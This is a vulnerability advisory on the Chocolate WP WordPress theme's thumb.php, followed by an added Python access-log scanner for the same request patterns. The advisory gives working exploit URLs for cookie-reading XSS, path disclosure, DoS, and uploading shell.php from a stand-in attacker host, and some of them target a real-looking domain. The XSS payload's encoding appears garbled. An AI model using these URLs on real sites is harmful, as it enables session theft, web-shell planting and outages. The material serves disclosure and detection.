Affected System: WordPress Chocolate WP Theme

Description:
bugtraq id: 57541

Chocolate WP is a business theme for WordPress. The Chocolate WP theme has cross-site scripting, full path disclosure, abuse of functionality, denial of service and arbitrary file upload vulnerabilities. Attackers can exploit these vulnerabilities to launch DoS attacks, upload arbitrary files to the affected server, and execute arbitrary script code in a victim's browser. Details:

XSS (WASC-08) (in older versions of TimThumb):
http://site/wp-content/themes/dt-chocolate/thumb.php?src0000%3cbody%20onload%alert(document.cookie%%3e.jpg

Full path disclosure (WASC-13):
http://site/wp-content/themes/dt-chocolate/thumb.php?src=%3C111
http://site/wp-content/themes/dt-chocolate/thumb.php?src=http://up.2cto.com/2013/0127/20130127104757723.png&h=1&w=1111111
http://site/wp-content/themes/dt-chocolate/thumb.php?src=http://up.2cto.com/2013/0127/20130127104757723.png&h=1111111&w=1

Abuse of Functionality (WASC-42):
http://site/wp-content/themes/dt-chocolate/thumb.php?src=http://site&h=1&w=1
http://site/wp-content/themes/dt-chocolate/thumb.php?src=http://site.badsite.com&h=1&w=1 (bypass of restriction on domain, if such restriction is turned on)

DoS (WASC-10):
http://site/wp-content/themes/dt-chocolate/thumb.php?src=http://site/big_file&h=1&w=1
http://site/wp-content/themes/dt-chocolate/thumb.php?src=http://site.badsite.com/big_file&h=1&w=1 (bypass of restriction on domain, if such restriction is turned on)

About such Abuse of Functionality and Denial of Service vulnerabilities you can read in my article "Using of the sites for attacks on other sites" (http://lists.grok.org.uk/pipermail/full-disclosure/2010-June/075384.html).

Arbitrary File Upload (WASC-31):
http://site/wp-content/themes/dt-chocolate/thumb.php?src=http://site.badsite.com/shell.php

Full path disclosure (WASC-13):
http://site/wp-content/themes/dt-chocolate/

Source: Eugene Dokukin, http://seclists.org/fulldisclosure/2013/Jan/215

Test method:
The following procedures (methods) may be offensive and are only to be used for security research and teaching. Use at your own risk!

To exploit these issues, an attacker must entice an unsuspecting user to follow a malicious URI. The following example URIs are available:
http://www.bkjia.com/wp-content/themes/dt-chocolate/thumb.php?src0000%3cbody%20onload%alert(document.cookie%%3e.jpg
http://www.example.com/wp-content/themes/dt-chocolate/thumb.php?src=http://site/big_file&h=1&w=1
http://www.example.com/wp-content/themes/dt-chocolate/thumb.php?src=http://site.badsite.com/big_file&h=1&w=1
http://www.example.com/wp-content/themes/dt-chocolate/thumb.php?src=http://site.badsite.com/shell.php

Suggestion:
Vendor patch: WordPress
Currently, the vendor has not provided a patch or an upgraded program. We recommend that users of this software follow the vendor's homepage to obtain the latest version: http://wordpress.org/
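As an added example (not part of the advisory or the theme's code), the following Python reviews web-server access-log lines for the thumb.php request patterns described above: fetches from hosts outside an allowlist (compared as the whole hostname, so site.badsite.com does not pass as "site"), markup in src, a .php file requested as the source, and absurd h/w values. ALLOWED_HOSTS, MAX_DIMENSION and the sample log lines are assumptions.

```python
"""Log review for the thumb.php request patterns in the advisory above. Added example,
not the advisory's code; ALLOWED_HOSTS, MAX_DIMENSION and SAMPLE_LOG are assumptions."""
import re
from urllib.parse import urlsplit, parse_qs

ALLOWED_HOSTS = {"site"}  # hosts thumb.php may fetch images from (assumed allowlist)
MAX_DIMENSION = 4096      # largest sane thumbnail size; the advisory's 1111111 is far beyond it
LOG_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def classify(request_uri):
    """Return finding labels for one request URI; empty list if nothing suspicious."""
    parts = urlsplit(request_uri)
    if not parts.path.lower().endswith("thumb.php"):
        return []
    # parse_qs percent-decodes values, so %3C arrives here as '<'.
    params = {k.lower(): v[0] for k, v in parse_qs(parts.query, keep_blank_values=True).items()}
    src = params.get("src", "")
    findings = []
    if re.search(r"[<>]", src):            # markup where an image path belongs (XSS probe)
        findings.append("markup-in-src")
    if src.lower().endswith(".php"):       # remote PHP file requested as an "image"
        findings.append("php-source-fetch")
    # Compare the whole hostname: a substring or suffix check would accept
    # site.badsite.com as "site", which is the domain-restriction bypass shown above.
    host = urlsplit(src).hostname
    if host and host not in ALLOWED_HOSTS:
        findings.append("remote-src:" + host)
    for dim in ("h", "w"):                 # absurd sizes: path-disclosure / DoS probes
        val = params.get(dim, "")
        if val.isdigit() and int(val) > MAX_DIMENSION:
            findings.append(f"oversized-{dim}={val}")
    return findings

def scan_log(lines):
    """Return (request_uri, findings) for every suspicious thumb.php request in the log."""
    hits = []
    for line in lines:
        m = LOG_RE.search(line)
        findings = classify(m.group(1)) if m else []
        if findings:
            hits.append((m.group(1), findings))
    return hits

# Constructed sample access-log lines (combined log format), not real traffic.
SAMPLE_LOG = [
    '203.0.113.5 - - [27/Jan/2013:10:47:57 +0000] "GET /wp-content/themes/dt-chocolate/thumb.php?src=http://site/img.png&h=100&w=100 HTTP/1.1" 200 512',
    '203.0.113.5 - - [27/Jan/2013:10:48:01 +0000] "GET /wp-content/themes/dt-chocolate/thumb.php?src=http://site.badsite.com/big_file&h=1&w=1 HTTP/1.1" 200 12',
    '203.0.113.5 - - [27/Jan/2013:10:48:05 +0000] "GET /wp-content/themes/dt-chocolate/thumb.php?src=http://site/img.png&h=1&w=1111111 HTTP/1.1" 500 0',
    '203.0.113.5 - - [27/Jan/2013:10:48:09 +0000] "GET /index.php HTTP/1.1" 200 2048',
]
```

Running scan_log(SAMPLE_LOG) flags the second and third lines only; the first is an in-allowlist fetch with normal dimensions and the fourth is not a thumb.php request.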